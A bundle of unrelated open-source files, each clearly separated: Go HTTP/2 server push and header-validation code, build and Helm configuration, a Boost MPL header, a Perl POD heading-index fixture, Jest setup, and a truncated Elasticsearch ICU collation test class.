// * -> rws.bw (*bufio.Writer) ->
// * (Handler might call Flush)
// * -> chunkWriter{rws}
// * -> responseWriterState.writeChunk(p []byte)
// * -> responseWriterState.writeChunk (most of the magic; see comment there)
func (w *responseWriter) Write(p []byte) (n int, err error) {
return w.write(len(p), p, "")
}
func (w *responseWriter) WriteString(s string) (n int, err error) {
return w.write(len(s), nil, s)
}
// either dataB or dataS is non-zero.
func (w *responseWriter) write(lenData int, dataB []byte, dataS string) (n int, err error) {
rws := w.rws
if rws == nil {
panic("Write called after Handler finished")
}
if !rws.wroteHeader {
w.WriteHeader(200)
}
if !bodyAllowedForStatus(rws.status) {
return 0, http.ErrBodyNotAllowed
}
rws.wroteBytes += int64(len(dataB)) + int64(len(dataS)) // only one can be set
if rws.sentContentLen != 0 && rws.wroteBytes > rws.sentContentLen {
// TODO: send a RST_STREAM
return 0, errors.New("http2: handler wrote more than declared Content-Length")
}
if dataB != nil {
return rws.bw.Write(dataB)
} else {
return rws.bw.WriteString(dataS)
}
}
func (w *responseWriter) handlerDone() {
rws := w.rws
dirty := rws.dirty
rws.handlerDone = true
w.Flush()
w.rws = nil
if !dirty {
// Only recycle the pool if all prior Write calls to
// the serverConn goroutine completed successfully. If
// they returned earlier due to resets from the peer
// there might still be write goroutines outstanding
// from the serverConn referencing the rws memory. See
// issue 20704.
responseWriterStatePool.Put(rws)
}
}
// Push errors.
var (
ErrRecursivePush = errors.New("http2: recursive push not allowed")
ErrPushLimitReached = errors.New("http2: push would exceed peer's SETTINGS_MAX_CONCURRENT_STREAMS")
)
// pushOptions is the internal version of http.PushOptions, which we
// cannot include here because it's only defined in Go 1.8 and later.
type pushOptions struct {
Method string
Header http.Header
}
func (w *responseWriter) push(target string, opts pushOptions) error {
st := w.rws.stream
sc := st.sc
sc.serveG.checkNotOn()
// No recursive pushes: "PUSH_PROMISE frames MUST only be sent on a peer-initiated stream."
// http://tools.ietf.org/html/rfc7540#section-6.6
if st.isPushed() {
return ErrRecursivePush
}
// Default options.
if opts.Method == "" {
opts.Method = "GET"
}
if opts.Header == nil {
opts.Header = http.Header{}
}
wantScheme := "http"
if w.rws.req.TLS != nil {
wantScheme = "https"
}
// Validate the request.
u, err := url.Parse(target)
if err != nil {
return err
}
if u.Scheme == "" {
if !strings.HasPrefix(target, "/") {
return fmt.Errorf("target must be an absolute URL or an absolute path: %q", target)
}
u.Scheme = wantScheme
u.Host = w.rws.req.Host
} else {
if u.Scheme != wantScheme {
return fmt.Errorf("cannot push URL with scheme %q from request with scheme %q", u.Scheme, wantScheme)
}
if u.Host == "" {
return errors.New("URL must have a host")
}
}
for k := range opts.Header {
if strings.HasPrefix(k, ":") {
return fmt.Errorf("promised request headers cannot include pseudo header %q", k)
}
// These headers are meaningful only if the request has a body,
// but PUSH_PROMISE requests cannot have a body.
// http://tools.ietf.org/html/rfc7540#section-8.2
// Also disallow Host, since the promised URL must be absolute.
switch strings.ToLower(k) {
case "content-length", "content-encoding", "trailer", "te", "expect", "host":
return fmt.Errorf("promised request headers cannot include %q", k)
}
}
if err := checkValidHTTP2RequestHeaders(opts.Header); err != nil {
return err
}
// The RFC effectively limits promised requests to GET and HEAD:
// "Promised requests MUST be cacheable [GET, HEAD, or POST], and MUST be safe [GET or HEAD]"
// http://tools.ietf.org/html/rfc7540#section-8.2
if opts.Method != "GET" && opts.Method != "HEAD" {
return fmt.Errorf("method %q must be GET or HEAD", opts.Method)
}
msg := &startPushRequest{
parent: st,
method: opts.Method,
url: u,
header: cloneHeader(opts.Header),
done: errChanPool.Get().(chan error),
}
select {
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
case sc.serveMsgCh <- msg:
}
select {
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
case err := <-msg.done:
errChanPool.Put(msg.done)
return err
}
}
type startPushRequest struct {
parent *stream
method string
url *url.URL
header http.Header
done chan error
}
func (sc *serverConn) startPush(msg *startPushRequest) {
sc.serveG.check()
// http://tools.ietf.org/html/rfc7540#section-6.6.
// PUSH_PROMISE frames MUST only be sent on a peer-initiated stream that
// is in either the "open" or "half-closed (remote)" state.
if msg.parent.state != stateOpen && msg.parent.state != stateHalfClosedRemote {
// responseWriter.Push checks that the stream is peer-initiaed.
msg.done <- errStreamClosed
return
}
// http://tools.ietf.org/html/rfc7540#section-6.6.
if !sc.pushEnabled {
msg.done <- http.ErrNotSupported
return
}
// PUSH_PROMISE frames must be sent in increasing order by stream ID, so
// we allocate an ID for the promised stream lazily, when the PUSH_PROMISE
// is written. Once the ID is allocated, we start the request handler.
allocatePromisedID := func() (uint32, error) {
sc.serveG.check()
// Check this again, just in case. Technically, we might have received
// an updated SETTINGS by the time we got around to writing this frame.
if !sc.pushEnabled {
return 0, http.ErrNotSupported
}
// http://tools.ietf.org/html/rfc7540#section-6.5.2.
if sc.curPushedStreams+1 > sc.clientMaxStreams {
return 0, ErrPushLimitReached
}
// http://tools.ietf.org/html/rfc7540#section-5.1.1.
// Streams initiated by the server MUST use even-numbered identifiers.
// A server that is unable to establish a new stream identifier can send a GOAWAY
// frame so that the client is forced to open a new connection for new streams.
if sc.maxPushPromiseID+2 >= 1<<31 {
sc.startGracefulShutdownInternal()
return 0, ErrPushLimitReached
}
sc.maxPushPromiseID += 2
promisedID := sc.maxPushPromiseID
// http://tools.ietf.org/html/rfc7540#section-8.2.
// Strictly speaking, the new stream should start in "reserved (local)", then
// transition to "half closed (remote)" after sending the initial HEADERS, but
// we start in "half closed (remote)" for simplicity.
// See further comments at the definition of stateHalfClosedRemote.
promised := sc.newStream(promisedID, msg.parent.id, stateHalfClosedRemote)
rw, req, err := sc.newWriterAndRequestNoBody(promised, requestParam{
method: msg.method,
scheme: msg.url.Scheme,
authority: msg.url.Host,
path: msg.url.RequestURI(),
header: cloneHeader(msg.header), // clone since handler runs concurrently with writing the PUSH_PROMISE
})
if err != nil {
// Should not happen, since we've already validated msg.url.
panic(fmt.Sprintf("newWriterAndRequestNoBody(%+v): %v", msg.url, err))
}
go sc.runHandler(rw, req, sc.handler.ServeHTTP)
return promisedID, nil
}
sc.writeFrame(FrameWriteRequest{
write: &writePushPromise{
streamID: msg.parent.id,
method: msg.method,
url: msg.url,
h: msg.header,
allocatePromisedID: allocatePromisedID,
},
stream: msg.parent,
done: msg.done,
})
}
// foreachHeaderElement splits v according to the "#rule" construction
// in RFC 2616 section 2.1 and calls fn for each non-empty element.
func foreachHeaderElement(v string, fn func(string)) {
v = textproto.TrimString(v)
if v == "" {
return
}
if !strings.Contains(v, ",") {
fn(v)
return
}
for _, f := range strings.Split(v, ",") {
if f = textproto.TrimString(f); f != "" {
fn(f)
}
}
}
// From http://httpwg.org/specs/rfc7540.html#rfc.section.8.1.2.2
var connHeaders = []string{
"Connection",
"Keep-Alive",
"Proxy-Connection",
"Transfer-Encoding",
"Upgrade",
}
// checkValidHTTP2RequestHeaders checks whether h is a valid HTTP/2 request,
// per RFC 7540 Section 8.1.2.2.
// The returned error is reported to users.
func checkValidHTTP2RequestHeaders(h http.Header) error {
for _, k := range connHeaders {
if _, ok := h[k]; ok {
return fmt.Errorf("request header %q is not valid in HTTP/2", k)
}
}
te := h["Te"]
if len(te) > 0 && (len(te) > 1 || (te[0] != "trailers" && te[0] != "")) {
return errors.New(`request header "TE" may only be "trailers" in HTTP/2`)
}
return nil
}
func new400Handler(err error) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
http.Error(w, err.Error(), http.StatusBadRequest)
}
}
// ValidTrailerHeader reports whether name is a valid header field name to appear
// in trailers.
// See: http://tools.ietf.org/html/rfc7230#section-4.1.2
func ValidTrailerHeader(name string) bool {
name = http.CanonicalHeaderKey(name)
if strings.HasPrefix(name, "If-") || badTrailer[name] {
return false
}
return true
}
var badTrailer = map[string]bool{
"Authorization": true,
"Cache-Control": true,
"Connection": true,
"Content-Encoding": true,
"Content-Length": true,
"Content-Range": true,
"Content-Type": true,
"Expect": true,
"Host": true,
"Keep-Alive": true,
"Max-Forwards": true,
"Pragma": true,
"Proxy-Authenticate": true,
"Proxy-Authorization": true,
"Proxy-Connection": true,
"Range": true,
"Realm": true,
"Te": true,
"Trailer": true,
"Transfer-Encoding": true,
"Www-Authenticate": true,
}
// h1ServerKeepAlivesDisabled reports whether hs has its keep-alives
// disabled. See comments on h1ServerShutdownChan above for why
// the code is written this way.
func h1ServerKeepAlivesDisabled(hs *http.Server) bool {
var x interface{} = hs
type I interface {
doKeepAlives() bool
}
if hs, ok := x.(I); ok {
return !hs.doKeepAlives()
}
return false
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{28675388-705d-4cd8-882e-32b51259a88a}</UniqueIdentifier>
<Extensions>cpp;c;cxx;def;odl;idl;hpj;bat;asm</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\Main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\Application62.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<None Include="CMakeLists.txt" />
<None Include="..\Diary.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\Application62.h">
<Filter>Source Files</Filter>
</ClInclude>
</ItemGroup>
</Project> | {
"pile_set_name": "Github"
} |
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License (the "License").
# You may not use this file except in compliance with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://opensource.org/licenses/CDDL-1.0.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2013 Saso Kiselkov. All rights reserved.
#
#
# This makefile drives the production of the edonr kernel module.
#
# intel architecture dependent
#
#
# Path to the base of the uts directory tree (usually /usr/src/uts).
#
UTSBASE = ../..
COMDIR = $(COMMONBASE)/crypto
#
# Define the module and object file sets.
#
MODULE = edonr
OBJECTS = $(EDONR_OBJS:%=$(OBJS_DIR)/%)
LINTS = $(EDONR_OBJS:%.o=$(LINTS_DIR)/%.ln)
ROOTMODULE = $(ROOT_CRYPTO_DIR)/$(MODULE)
ROOTLINK = $(ROOT_MISC_DIR)/$(MODULE)
#
# Include common rules.
#
include $(UTSBASE)/intel/Makefile.intel
#
# Define targets
#
ALL_TARGET = $(BINARY)
LINT_TARGET = $(MODULE).lint
INSTALL_TARGET = $(BINARY) $(ROOTMODULE) $(ROOTLINK)
#
# Linkage dependencies
#
LDFLAGS += -dy -Nmisc/kcf
CFLAGS += -I$(COMDIR)
LINTFLAGS += -I$(COMDIR)
#
# Default build targets.
#
.KEEP_STATE:
def: $(DEF_DEPS)
all: $(ALL_DEPS)
clean: $(CLEAN_DEPS)
clobber: $(CLOBBER_DEPS)
lint: $(LINT_DEPS)
modlintlib: $(MODLINTLIB_DEPS)
clean.lint: $(CLEAN_LINT_DEPS)
install: $(INSTALL_DEPS)
$(ROOTLINK): $(ROOT_MISC_DIR) $(ROOTMODULE)
-$(RM) $@; ln $(ROOTMODULE) $@
#
# Include common targets.
#
include $(UTSBASE)/intel/Makefile.targ
| {
"pile_set_name": "Github"
} |
Text: Acknowledgements; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Acknowledgements
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3910 in perl5144delta.pod
Text: CVE-2013-1667: memory exhaustion with arbitrary hash keys; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: CVE-2013-1667: memory exhaustion with arbitrary hash keys
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 608 in perl5144delta.pod
Text: Changes to Existing Documentation; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Changes to Existing Documentation
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2975 in perl5144delta.pod
Text: Configuration and Compilation; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Configuration and Compilation
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3106 in perl5144delta.pod
Text: Core Enhancements; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Core Enhancements
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 329 in perl5144delta.pod
Text: DESCRIPTION; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: DESCRIPTION
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 75 in perl5144delta.pod
Text: Deprecations; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Deprecations
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2359 in perl5144delta.pod
Text: Diagnostics; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Diagnostics
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3024 in perl5144delta.pod
Text: Discontinued Platforms; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Discontinued Platforms
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3211 in perl5144delta.pod
Text: Documentation; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Documentation
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2920 in perl5144delta.pod
Text: Incompatible Changes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Incompatible Changes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2215 in perl5144delta.pod
Text: Known Problems; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Known Problems
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3880 in perl5144delta.pod
Text: List::Util; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: List::Util
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2694 in perl5144delta.pod
Text: Modules and Pragmata; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Modules and Pragmata
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2427 in perl5144delta.pod
Text: NAME; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: NAME
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 16 in perl5144delta.pod
Text: New Documentation; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Documentation
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2942 in perl5144delta.pod
Text: New Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2456 in perl5144delta.pod
Text: New Platforms; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Platforms
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3182 in perl5144delta.pod
Text: Platform Support; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Platform Support
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3157 in perl5144delta.pod
Text: Platform-Specific Notes; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Platform-Specific Notes
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3249 in perl5144delta.pod
Text: Removed Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Removed Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2876 in perl5144delta.pod
Text: Reporting Bugs; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Reporting Bugs
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 4878 in perl5144delta.pod
Text: SDBM_File; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: SDBM_File
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2677 in perl5144delta.pod
Text: SEE ALSO; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: SEE ALSO
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 6066 in perl5144delta.pod
Text: Security; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Security
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 381 in perl5144delta.pod
Text: Selected Bug Fixes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Selected Bug Fixes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3549 in perl5144delta.pod
Text: Socket; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: Socket
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2663 in perl5144delta.pod
Text: Updated Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Updated Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2495 in perl5144delta.pod
Text: Utility Changes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Utility Changes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3076 in perl5144delta.pod
Text: VMS; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: VMS
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 3290 in perl5144delta.pod
Text: [perl #111586] SDBM_File: fix off-by-one access to global ".dir"; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #111586] SDBM_File: fix off-by-one access to global ".dir"
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1213 in perl5144delta.pod
Text: [perl #111594] Socket::unpack_sockaddr_un heap-buffer-overflow; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #111594] Socket::unpack_sockaddr_un heap-buffer-overflow
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1025 in perl5144delta.pod
Text: [perl #115992] PL_eval_start use-after-free; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #115992] PL_eval_start use-after-free
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1832 in perl5144delta.pod
Text: [perl #115994] fix segv in regcomp.c:S_join_exact(); Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #115994] fix segv in regcomp.c:S_join_exact()
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1564 in perl5144delta.pod
Text: memory leak in Encode; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: memory leak in Encode
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 907 in perl5144delta.pod
Text: off-by-two error in List::Util; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: off-by-two error in List::Util
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1391 in perl5144delta.pod
Text: wrap-around with IO on long strings; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: wrap-around with IO on long strings
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2038 in perl5144delta.pod | {
"pile_set_name": "Github"
} |
# Default values for geektime-mobile-apiaggregator.
# This is a YAML-formatted file.
# Declare variables to be passed into your templates.
replicaCount: 1
image:
repository: geektime-mobile-apiaggregator
pullPolicy: IfNotPresent
imagePullSecrets: []
nameOverride: ""
fullnameOverride: ""
serviceAccount:
# Specifies whether a service account should be created
create: false
# The name of the service account to use.
# If not set and create is true, a name is generated using the fullname template
name:
podSecurityContext: {}
# fsGroup: 2000
securityContext: {}
# capabilities:
# drop:
# - ALL
# readOnlyRootFilesystem: true
# runAsNonRoot: true
# runAsUser: 1000
service:
type: ClusterIP
port: 80
ingress:
enabled: false
annotations: {}
# kubernetes.io/ingress.class: nginx
# kubernetes.io/tls-acme: "true"
hosts:
- host: chart-example.local
paths: []
tls: []
# - secretName: chart-example-tls
# hosts:
# - chart-example.local
resources: {}
# We usually recommend not to specify default resources and to leave this as a conscious
# choice for the user. This also increases chances charts run on environments with little
# resources, such as Minikube. If you do want to specify resources, uncomment the following
# lines, adjust them as necessary, and remove the curly braces after 'resources:'.
# limits:
# cpu: 100m
# memory: 128Mi
# requests:
# cpu: 100m
# memory: 128Mi
nodeSelector: {}
tolerations: []
affinity: {}
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/not_equal_to.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
template<
typename Tag1
, typename Tag2
>
struct not_equal_to_impl
: if_c<
( BOOST_MPL_AUX_NESTED_VALUE_WKND(int, Tag1)
> BOOST_MPL_AUX_NESTED_VALUE_WKND(int, Tag2)
)
, aux::cast2nd_impl< not_equal_to_impl< Tag1,Tag1 >,Tag1, Tag2 >
, aux::cast1st_impl< not_equal_to_impl< Tag2,Tag2 >,Tag1, Tag2 >
>::type
{
};
/// for Digital Mars C++/compilers with no CTPS/TTP support
template<> struct not_equal_to_impl< na,na >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename Tag > struct not_equal_to_impl< na,Tag >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename Tag > struct not_equal_to_impl< Tag,na >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename T > struct not_equal_to_tag
{
typedef typename T::tag type;
};
template<
typename BOOST_MPL_AUX_NA_PARAM(N1)
, typename BOOST_MPL_AUX_NA_PARAM(N2)
>
struct not_equal_to
: not_equal_to_impl<
typename not_equal_to_tag<N1>::type
, typename not_equal_to_tag<N2>::type
>::template apply< N1,N2 >::type
{
BOOST_MPL_AUX_LAMBDA_SUPPORT(2, not_equal_to, (N1, N2))
};
BOOST_MPL_AUX_NA_SPEC2(2, 2, not_equal_to)
}}
namespace boost { namespace mpl {
template<>
struct not_equal_to_impl< integral_c_tag,integral_c_tag >
{
template< typename N1, typename N2 > struct apply
: bool_< ( BOOST_MPL_AUX_VALUE_WKND(N1)::value != BOOST_MPL_AUX_VALUE_WKND(N2)::value ) >
{
};
};
}}
| {
"pile_set_name": "Github"
} |
import Enzyme from "enzyme";
import Adapter from "enzyme-adapter-react-16";
import "jest-enzyme";
global.localStorage = {
getItem: () => {},
setItem: () => {},
clear: () => {}
};
Enzyme.configure({ adapter: new Adapter() });
| {
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.analysis;
import com.ibm.icu.text.Collator;
import com.ibm.icu.text.RuleBasedCollator;
import com.ibm.icu.util.ULocale;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.analysis.Tokenizer;
import org.apache.lucene.analysis.core.KeywordTokenizer;
import org.apache.lucene.analysis.tokenattributes.CharTermAttribute;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.index.Index;
import org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin;
import org.elasticsearch.test.ESTestCase;
import java.io.IOException;
import java.io.StringReader;
import static org.hamcrest.Matchers.equalTo;
// Tests borrowed from Solr's Icu collation key filter factory test.
public class SimpleIcuCollationTokenFilterTests extends ESTestCase {
/*
* Tests usage where we do not provide a language or locale
*/
public void testDefaultUsage() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "FOO", "foo");
}
/*
* Turkish has some funny casing.
* This test shows how you can solve this kind of thing easily with collation.
* Instead of using LowerCaseFilter, use a turkish collator with primary strength.
* Then things will sort and match correctly.
*/
public void testBasicUsage() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "tr")
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "I WİLL USE TURKİSH CASING", "ı will use turkish casıng");
}
/*
* Test usage of the decomposition option for unicode normalization.
*/
public void testNormalization() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "tr")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.decomposition", "canonical")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "I W\u0049\u0307LL USE TURKİSH CASING", "ı will use turkish casıng");
}
/*
* Test secondary strength, for english case is not significant.
*/
public void testSecondaryStrength() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "secondary")
.put("index.analysis.filter.myCollator.decomposition", "no")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "TESTING", "testing");
}
/*
* Setting alternate=shifted to shift whitespace, punctuation and symbols
* to quaternary level
*/
public void testIgnorePunctuation() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.alternate", "shifted")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "foo-bar", "foo bar");
}
/*
* Setting alternate=shifted and variableTop to shift whitespace, but not
* punctuation or symbols, to quaternary level
*/
public void testIgnoreWhitespace() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.alternate", "shifted")
.put("index.analysis.filter.myCollator.variableTop", " ")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "foo bar", "foobar");
// now assert that punctuation still matters: foo-bar < foo bar
assertCollation(filterFactory, "foo-bar", "foo bar", -1);
}
/*
* Setting numeric to encode digits with numeric value, so that
* foobar-9 sorts before foobar-10
*/
public void testNumerics() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.numeric", "true")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "foobar-9", "foobar-10", -1);
}
/*
* Setting caseLevel=true to create an additional case level between
* secondary and tertiary
*/
public void testIgnoreAccentsButNotCase() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.caseLevel", "true")
.build();
